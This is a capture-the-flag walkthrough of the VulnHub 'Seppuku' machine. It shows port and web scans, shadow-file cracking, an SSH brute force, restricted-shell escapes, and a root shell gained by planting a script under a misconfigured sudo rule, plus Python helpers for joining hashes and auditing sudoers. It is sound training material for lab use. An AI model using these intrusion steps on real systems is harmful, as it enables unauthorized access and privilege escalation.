30 March 2023

Pentesting Fun Stuff

following the cyber security path…

Seppuku

Introduction

At the time of writing, this is the latest challenge created by the SunCSR Team and hosted on VulnHub.
This challenge is rated ‘Intermediate to Hard’ and has rabbit holes to watch out for.
The goal is to get a root shell and obtain the flag under /root.
It is part of a series of challenges ranging from beginner upwards.
The challenges themselves mix CTF-style puzzles with realistic admin mistakes.
Hopefully this team will create a lot more challenges, but for now let’s enjoy the latest one.

Enumeration

As always we start with a port-scan to get a good view on what ports are open and what services are running behind them.

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 cd:55:a8:e4:0f:28:bc:b2:a6:7d:41:76:bb:9f:71:f4 (RSA)
|   256 16:fa:29:e4:e0:8a:2e:7d:37:d2:6f:42:b2:dc:e9:22 (ECDSA)
|_  256 bb:74:e8:97:fa:30:8d:da:f9:5c:99:f0:d9:24:8a:d5 (ED25519)
80/tcp   open  http        nginx 1.14.2
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Restricted Content
|_http-server-header: nginx/1.14.2
|_http-title: 401 Authorization Required
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080/tcp open  ssl/http    LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title:  404 Not Found
| ssl-cert: Subject: commonName=seppuku/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US
| Not valid before: 2020-05-13T06:51:35
|_Not valid after:  2022-08-11T06:51:35
|_ssl-date: 2020-06-11T11:43:26+00:00; -1s from scanner time.
| tls-alpn: 
|   h2
|   spdy/3
|   spdy/2
|_  http/1.1
7601/tcp open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Seppuku
8088/tcp open  http        LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Seppuku
MAC Address: 00:0C:29:54:84:CE (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=6/11%OT=21%CT=1%CU=36600%PV=Y%DS=1%DC=D%G=Y%M=000C29%T
OS:M=5EE218E0%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=106%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S)

Network Distance: 1 hop
Service Info: Host: SEPPUKU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 59m58s, deviation: 2h00m00s, median: -1s
|_nbstat: NetBIOS name: SEPPUKU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: seppuku
|   NetBIOS computer name: SEPPUKU\x00
|   Domain name: \x00
|   FQDN: seppuku
|_  System time: 2020-06-11T07:43:23-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-06-11T11:43:23
|_  start_date: N/A

From the scan it looks like there is an FTP-server (port 21), an SSH-server (port 22), several web-servers (ports 80, 7080, 7601 and 8088) and an SMB-server (ports 139 and 445).
The FTP and SSH servers need credentials, so I’ll start with enumerating the web-servers.

Nikto

For a basic web-server scan, Nikto is a very useful tool.

Starting with port 80:

---------------------------------------------------------------------------
+ Target IP:          10.0.0.18
+ Target Hostname:    10.0.0.18
+ Target Port:        80
+ Start Time:         2020-06-11 14:39:35 (GMT2)
---------------------------------------------------------------------------
+ Server: nginx/1.14.2
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ / - Requires Authentication for realm 'Restricted Content'
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ 8040 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2020-06-11 14:39:52 (GMT2) (17 seconds)
---------------------------------------------------------------------------

There is an info.php file, and basic authentication is in place.
Unlike its predecessors (other challenges from this creator), this one doesn’t accept admin:admin.

Next up is port 7080:

---------------------------------------------------------------------------
+ Target IP:          10.0.0.18
+ Target Hostname:    seppuku
+ Target Port:        7080
+ Start Time:         2020-06-11 14:56:10 (GMT2)
---------------------------------------------------------------------------
+ Server: LiteSpeed
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: https://seppuku/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ 7681 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2020-06-11 14:56:31 (GMT2) (21 seconds)
---------------------------------------------------------------------------

Then port 7601:

---------------------------------------------------------------------------
+ Target IP:          10.0.0.18
+ Target Hostname:    10.0.0.18
+ Target Port:        7601
+ Start Time:         2020-06-11 14:47:18 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: ab, size: 5a58219394d90, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST 
+ OSVDB-3268: /c/: Directory indexing found.
+ OSVDB-3092: /c/: This might be interesting...
+ OSVDB-3268: /secret/: Directory indexing found.
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3268: /database/: Directory indexing found.
+ OSVDB-3093: /database/: Databases? Really??
+ OSVDB-3268: /a/: Directory indexing found.
+ OSVDB-3233: /a/: May be Kebi Web Mail administration menu.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /ckeditor/ckeditor.js: CKEditor identified. This file might also expose the version of CKEditor.
+ /ckeditor/CHANGES.md: CKEditor Changelog identified.
+ 7892 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time:           2020-06-11 14:47:41 (GMT2) (23 seconds)
---------------------------------------------------------------------------

This one has some interesting findings.

Index of /secret
Name	Last modified	Size	Description
Parent Directory	 	        - 	 
hostname	2020-05-13 03:41 	8 	 
jack.jpg	2018-09-12 03:49 	58K	 
passwd.bak	2020-05-13 03:47 	2.7K	 
password.lst	2020-05-13 03:59 	672 	 
shadow.bak	2020-05-13 03:48 	1.4K	 
Apache/2.4.38 (Debian) Server at 10.0.0.18 Port 7601

Hostname = seppuku.
The image is of Jack the Ripper (not very subtle, or another rabbit hole?).
A password list, plus a passwd and a shadow file.
Between the warning about rabbit holes and this looking way too easy I’m suspicious, but hey, let’s give it a try.

n0w4n@lab:~/ctf/vulnhub/seppuku/7601$ unshadow passwd.bak shadow.bak > hashes.txt
n0w4n@lab:~/ctf/vulnhub/seppuku/7601$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
a1b2c3           (rabbit-hole)
1g 0:00:00:00 DONE (2020-06-11 15:32) 1.219g/s 2809p/s 2809c/s 2809C/s slimshady..abcdefgh
Use the "--show" option to display all of the cracked passwords reliably
Session completed

There are some things that are bothering me.
1. the name of the user is rabbit-hole (I was warned to look out for it)
2. the usernames in passwd and shadow are slightly different (unshadow joins the two files by username, so for John to load the hash at all I needed to alter it)
3. the found password doesn’t work on anything (this one kills me hahaha)
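Point 2 is why John reported only one loaded hash: unshadow matches entries strictly by the name in the first field, so a name spelled differently in the two files is never joined, and a hash field of * or ! means a locked account with nothing to crack. The Python below is an added example for this write-up, not code from the original post or from John the Ripper; it joins a constructed passwd/shadow pair (placeholder hashes, not the leaked files) the same way, reports names present on only one side, and suggests the likely counterpart.

```python
"""Join a leaked passwd/shadow pair the way unshadow does, and explain the gaps.

Added example for this write-up; not code from the original post or from
John the Ripper. unshadow matches entries strictly by the username in field
one, so a name spelled differently in the two files never gets joined and
john loads fewer hashes than the shadow file seems to offer. This version
reports those orphans and suggests the likely counterpart.
"""
import difflib

# Constructed sample files (not the leaked ones). Hash fields are placeholders,
# not real sha512crypt digests.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
seppuku:x:1000:1000:,,,:/home/seppuku:/bin/rbash
rabbit-hole:x:1003:1004::/home/rabbit-hole:/bin/bash
tanto:x:1002:1003::/home/tanto:/bin/rbash
"""
SHADOW = """\
root:*:18395:0:99999:7:::
Seppuku:$6$xs4lt$placeholder.hash.one:18395:0:99999:7:::
rabbit-hole:$6$ys4lt$placeholder.hash.two:18395:0:99999:7:::
tanto:!:18395:0:99999:7:::
"""


def parse_colon_file(text, min_fields):
    """Return {username: fields} for every non-empty, non-comment line."""
    entries = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < min_fields:
            raise ValueError(f"line {lineno}: expected {min_fields} fields, got {len(fields)}")
        entries[fields[0]] = fields
    return entries


def is_locked(hash_field):
    """Locked or passwordless accounts carry no crackable hash."""
    return hash_field in ("", "*", "!", "!!") or hash_field.startswith("!")


def unshadow(passwd_text, shadow_text):
    """Join by username; report what could not be joined and why."""
    users = parse_colon_file(passwd_text, 7)
    shadow = parse_colon_file(shadow_text, 2)
    result = {
        "hashes": [],
        "locked": [],
        "only_in_passwd": [],
        "only_in_shadow": sorted(set(shadow) - set(users)),
        "suggestions": {},
    }
    for name, fields in users.items():
        if name not in shadow:
            result["only_in_passwd"].append(name)
            continue
        hash_field = shadow[name][1]
        if is_locked(hash_field):
            result["locked"].append(name)
            continue
        # john's input format: the passwd line with 'x' replaced by the shadow hash
        result["hashes"].append(":".join([name, hash_field] + fields[2:]))
    # A passwd name with no shadow entry is often just a spelling/case mismatch.
    for name in result["only_in_passwd"]:
        match = difflib.get_close_matches(name, result["only_in_shadow"], n=1, cutoff=0.8)
        if match:
            result["suggestions"][name] = match[0]
    return result


if __name__ == "__main__":
    r = unshadow(PASSWD, SHADOW)
    print("\n".join(r["hashes"]))  # this is what you feed to john
    for name, guess in r["suggestions"].items():
        print(f"# {name!r} has no shadow entry; did you mean {guess!r}?")
```

With the constructed input only rabbit-hole produces a crackable line, seppuku is flagged as having no shadow entry with Seppuku suggested as the match, and root and tanto are reported as locked.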

So, not wasting my time much longer, I discard this option and check what else I have found.

In this folder are two other items that are interesting.
The hostname, being seppuku, and a password list.
Because this means brute-forcing, which I really dislike, I’ll finish the enumeration on the other web-servers first.

Another finding is CKEditor. In the javascript file I can find the version number:

version:"4.14.0",revision:"8a12b04171"

Checking exploit-db it looks like this version has no known vulnerability. Skipping it for now.

Another directory on port 7601, /keys/, holds a file private.bak containing an RSA private key (body omitted here):

-----BEGIN RSA PRIVATE KEY-----
…
-----END RSA PRIVATE KEY-----

And finally port 8088:

---------------------------------------------------------------------------
+ Target IP:          10.0.0.18
+ Target Hostname:    10.0.0.18
+ Target Port:        8088
+ Start Time:         2020-06-11 14:48:04 (GMT2)
---------------------------------------------------------------------------
+ Server: LiteSpeed
+ Server may leak inodes via ETags, header found with file /, inode: ab, size: 5ebb9a5f, mtime: 215e6;;;
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.6.36
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Multiple index files found: /index.php, /index.html
+ 7895 requests: 4 error(s) and 6 item(s) reported on remote host
+ End Time:           2020-06-11 14:49:46 (GMT2) (102 seconds)
---------------------------------------------------------------------------

By default the browser lands on index.html with this web-server, but if you go manually to index.php, you get something more interesting:

According to the website, Web Console is a web-based application that allows you to execute shell commands on a server directly from a browser (web-based SSH).

login: admin
password: *****
Wrong password try again!
login: ldkjfs
password: *******
Wrong password try again!
login: lskdjfsldfk
password: ***********
Wrong password try again!
login: sldkfjsfdlk
password: *********
Wrong password try again!
login: sldkfjsdlkj
password: ***********
Wrong password try again!

From the looks of it, there is no lockout threshold (clipping level) keeping me from a brute-force session (maybe later).

Phase 2

Let’s start with brute-forcing the SSH server first, using the hostname seppuku as the username and password.lst from /secret/ as the wordlist (if this works, I can skip all the other nonsense).

[DATA] attacking ssh://10.0.0.18:22/
[22][ssh] host: 10.0.0.18   login: seppuku   password: eeyoree

So……..this is a welcome surprise.

n0w4n@lab:~/ctf/vulnhub/seppuku/7601$ ssh seppuku@10.0.0.18
seppuku@10.0.0.18's password: 
Linux seppuku 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed May 13 10:52:41 2020 from 192.168.1.48
seppuku@seppuku:~$ id
uid=1000(seppuku) gid=1000(seppuku) groups=1000(seppuku),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
seppuku@seppuku:~$ ls -lah
total 28K
drwxr-xr-x 3 seppuku seppuku 4.0K Jun 11 08:00 .
drwxr-xr-x 5 root    root    4.0K May 13 04:50 ..
-rw-r--r-- 1 seppuku seppuku  220 May 13 00:28 .bash_logout
-rw-r--r-- 1 seppuku seppuku 3.5K May 13 00:28 .bashrc
drwx------ 3 seppuku seppuku 4.0K May 13 10:05 .gnupg
-rw-r--r-- 1 root    root      20 May 13 04:47 .passwd
-rw-r--r-- 1 seppuku seppuku  807 May 13 00:28 .profile
seppuku@seppuku:~$ cat .passwd
12345685213456!@!@A
seppuku@seppuku:~$ cd .gnupg/
-rbash: cd: restricted

Wait, what?

seppuku@seppuku:~$ echo $SHELL
/bin/rbash

Crap……I’m inside a restricted shell.

When inside a restricted shell, it is wise to do some enumeration first.
Like, what commands are available?
Which operators work (redirects, pipes, command substitution)?
What interpreters are available (python, perl, ruby, etc.)?
What can you run with sudo (sudo -l)?

seppuku@seppuku:~$ chsh
Password: 
Changing the login shell for seppuku
Enter the new value, or press ENTER for the default
	Login Shell [/bin/rbash]: /bin/bash
seppuku@seppuku:~$ echo $SHELL
/bin/rbash
seppuku@seppuku:~$ su seppuku
Password: 
seppuku@seppuku:~$ echo $SHELL
/bin/bash
seppuku@seppuku:~$ echo test > test

Here I used chsh to change my login shell (easy, right?). chsh only rewrites my entry in /etc/passwd, which is why $SHELL still says rbash in the current session; the su to my own account starts a fresh login that picks up /bin/bash.
In a better restricted environment chsh wouldn’t be available (or the shell field would be locked), but it’s always worth checking.

seppuku@seppuku:~$ sudo -l
Matching Defaults entries for seppuku on seppuku:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User seppuku may run the following commands on seppuku:
    (ALL) NOPASSWD: /usr/bin/ln -sf /root/ /tmp/

I can create a symbolic link to /root inside /tmp/, as root. By itself that gets me nothing: a symlink doesn’t change the permissions of its target, and /root is accessible to root only (the listing at the end shows it as drwx------), so this looks like another rabbit hole.
What else?

seppuku@seppuku:~$ ls /home
samurai  seppuku  tanto

And I have a .passwd file with just one password.

seppuku@seppuku:~$ su samurai
Password: 
samurai@seppuku:/home/seppuku$ id
uid=1001(samurai) gid=1002(samurai) groups=1002(samurai)

samurai@seppuku:~$ echo $SHELL
/bin/rbash

<sigh>

Just repeat the previous option.
Also……If your shell gives you problems with restrictions (while you have a bash shell), just exit and log back in with SSH.
You will have a good working bash shell.

samurai@seppuku:/home/seppuku$ sudo -l
Matching Defaults entries for samurai on seppuku:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User samurai may run the following commands on seppuku:
    (ALL) NOPASSWD: /../../../../../../home/tanto/.cgi_bin/bin /tmp/*
samurai@seppuku:~$ ls -lah ../tanto/
total 32K
drwxr-xr-x 5 tanto tanto 4.0K Jun 11 08:00 .
drwxr-xr-x 5 root  root  4.0K May 13 04:50 ..
-rw-r--r-- 1 tanto tanto  220 May 13 04:50 .bash_logout
-rw-r--r-- 1 tanto tanto 3.5K May 13 04:50 .bashrc
drwx------ 3 tanto tanto 4.0K May 13 05:27 .gnupg
drwxr-xr-x 3 tanto tanto 4.0K May 13 05:23 .local
-rw-r--r-- 1 tanto tanto  807 May 13 04:50 .profile
drwxr-xr-x 2 tanto tanto 4.0K May 13 05:26 .ssh

No .cgi_bin. Another rabbit hole?
Unlike my current user and the previous one, user tanto has a .ssh folder.

In the beginning of the enumeration, I found a ssh key.
Let’s try and use it on user tanto.

samurai@seppuku:/home/tanto/.ssh$ which nc
samurai@seppuku:/home/tanto/.ssh$ which netcat
samurai@seppuku:/home/tanto/.ssh$ which wget
/usr/bin/wget

To transfer a file I need a transfer tool……looks like we have wget at our disposal.
First I start a Python web server in the directory where the SSH key is.

n0w4n@lab:~/ctf/vulnhub/seppuku/7601$ sudo python3 -m http.server 80
[sudo] password for n0w4n: 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Then I retrieve the key with wget, rename it and fix its permissions (otherwise SSH will refuse the key and scream bloody murder).

samurai@seppuku:~$ mv private.bak id_rsa && chmod 600 id_rsa

And finally log in as user tanto using the key, from the box itself (hence the host-key prompt for 10.0.0.18).

The authenticity of host '10.0.0.18 (10.0.0.18)' can't be established.
ECDSA key fingerprint is SHA256:RltTwzbYqqcBz4/ww5KEokNttE+fZwM7l4bvzFaf558.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.0.0.18' (ECDSA) to the list of known hosts.
Linux seppuku 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed May 13 10:53:17 2020 from 192.168.1.48
tanto@seppuku:~$ id
uid=1002(tanto) gid=1003(tanto) groups=1003(tanto)
tanto@seppuku:~$ cd
-rbash: cd: restricted

<very big sigh>

The previous method won’t work, because chsh asks for the user’s password and I don’t have one for tanto.
Luckily there are numerous other ways out of a restricted shell. rbash only restricts the shell itself (no cd, no changing PATH, no command names containing a slash, no redirects); it still lets you run any program found in PATH, and the bash it finds there starts unrestricted.

tanto@seppuku:~$ bash -i
tanto@seppuku:~$ cd

Now that I am free to do as I please, it’s time to take a look at the sudo command from user samurai.

User samurai may run the following commands on seppuku:
    (ALL) NOPASSWD: /../../../../../../home/tanto/.cgi_bin/bin /tmp/*

Basically it says samurai can run, as root and without a password, a file called bin from /home/tanto/.cgi_bin: the string of /../ components just walks up to / and back down, so the rule resolves to /home/tanto/.cgi_bin/bin. The directory doesn’t exist yet, but tanto owns /home/tanto, so tanto can create it and put whatever he likes in bin.
Cool.
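Both sudo rules on this box (the ln rule for seppuku and the .cgi_bin rule for samurai) come down to the same review question: does the caller control anything the rule trusts? The Python below is an added example for this write-up, not code from the original post or from the sudo project. It normalizes the command path (so the /../ trick is undone), checks every ancestor directory against an ownership table, and flags wildcard arguments. The rule text is the sudo -l output from above; the ownership table is a constructed dict standing in for os.stat(), so it runs offline.

```python
"""Audit sudoers command rules for trust a non-root caller can subvert.

Added example for this write-up; not code from the original post or from the
sudo project. It normalizes the command path ('..' components), checks every
ancestor directory against an ownership table, and flags wildcard arguments.
Ownership comes from a constructed dict standing in for os.stat(), so this
runs offline; on a live box you would build that dict from the filesystem.
"""
import posixpath
import re

# Constructed ownership table (directory -> owner), mirroring the /home
# listing on the box; anything not listed is treated as root-owned.
OWNERS = {
    "/": "root",
    "/home": "root",
    "/home/seppuku": "seppuku",
    "/home/samurai": "samurai",
    "/home/tanto": "tanto",
    "/usr": "root",
    "/usr/bin": "root",
    "/tmp": "root",
}

# Constructed sudoers fragment carrying the two rules seen in `sudo -l`.
SUDOERS = """\
Defaults env_reset, mail_badpass
seppuku ALL=(ALL) NOPASSWD: /usr/bin/ln -sf /root/ /tmp/
samurai ALL=(ALL) NOPASSWD: /../../../../../../home/tanto/.cgi_bin/bin /tmp/*
"""

RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+?)\s*=\s*"   # who, on which host
    r"(?:\((?P<runas>[^)]*)\))?\s*"              # optional (runas) list
    r"(?P<tags>(?:[A-Z]+:\s*)*)"                 # NOPASSWD:, SETENV:, ...
    r"(?P<cmd>.+)$"                              # command specs
)


def untrusted_ancestors(path, owners):
    """Every directory from path up to / that a non-root user owns."""
    hits = []
    p = path
    while True:
        owner = owners.get(p, "root")
        if owner != "root":
            hits.append((p, owner))
        parent = posixpath.dirname(p)
        if parent == p:
            return hits
        p = parent


def audit_rule(line, owners=OWNERS):
    """Parse one user specification and return it with a list of findings."""
    m = RULE_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a user specification: {line!r}")
    findings = []
    for spec in m.group("cmd").split(","):
        parts = spec.split()
        if not parts or parts[0] == "ALL":
            findings.append("ALL: any command")
            continue
        raw, args = parts[0], parts[1:]
        real = posixpath.normpath(raw)      # collapses the leading /../.. chain
        if real != raw:
            findings.append(f"path disguised: {raw} -> {real}")
        for directory, owner in untrusted_ancestors(real, owners):
            findings.append(f"{real} sits under {directory}, owned by {owner}: that user can plant the binary")
        if any(c in arg for arg in args for c in "*?["):
            findings.append(f"wildcard in arguments {' '.join(args)}: the caller chooses what fills the wildcard")
    return {
        "user": m.group("user"),
        "runas": m.group("runas") or "root",   # sudo defaults to root when no runas is given
        "nopasswd": "NOPASSWD" in m.group("tags"),
        "findings": findings,
    }


def audit_sudoers(text, owners=OWNERS):
    """Audit every user specification; Defaults and alias lines are skipped."""
    reports = []
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#") or s.startswith("Defaults") or "_Alias" in s:
            continue
        reports.append(audit_rule(s, owners))
    return reports


if __name__ == "__main__":
    for report in audit_sudoers(SUDOERS):
        print(f"{report['user']} -> ({report['runas']}) NOPASSWD={report['nopasswd']}")
        for finding in report["findings"] or ["nothing flagged"]:
            print("   ", finding)
```

Run against the two rules, the samurai rule produces three findings (disguised path, a parent directory owned by tanto, a wildcard argument) while the ln rule produces none, which matches how the box plays out: the symlink rule is a dead end because a link does not change the permissions of /root.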

Let’s create the folder and file so the sudo permission of samurai can be exploited (only the executable bit matters, so chmod +x would do; a #!/bin/bash shebang would make the script explicit, but sudo runs a shebang-less file through /bin/sh anyway).

tanto@seppuku:~$ mkdir .cgi_bin && cd .cgi_bin
tanto@seppuku:~/.cgi_bin$ echo "/bin/bash" > bin
tanto@seppuku:~/.cgi_bin$ chmod 777 bin

Now from another shell with user samurai open:

samurai@seppuku:/home/seppuku$ sudo /../../../../../../home/tanto/.cgi_bin/bin /tmp/*
root@seppuku:/home/seppuku# id
uid=0(root) gid=0(root) groups=0(root)
root@seppuku:~# ls -lah
total 40K
drwx------  5 root root 4.0K May 13 10:42 .
drwxr-xr-x 18 root root 4.0K May 13 00:25 ..
-rw-------  1 root root  126 May 13 10:53 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwx------  3 root root 4.0K May 13 10:41 .gnupg
drwxr-xr-x  3 root root 4.0K May 13 02:53 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   24 May 13 04:51 root.txt
-rw-r--r--  1 root root   66 May 13 05:31 .selected_editor
drwxr-xr-x  2 root root 4.0K May 13 10:39 .ssh
root@seppuku:~# cat root.txt
{SunCSR_Seppuku_2020_X}

And there you have it.

Conclusion

This was by far the best challenge out of the series.
It had multiple misleading options and a lot to go through.
As with a lot of pentesting, notes are very important, so you can keep track of what you’re doing.

I really like the fact that I needed to link things I found at the beginning to what I found at the end to get further.

Really nice work with this challenge.
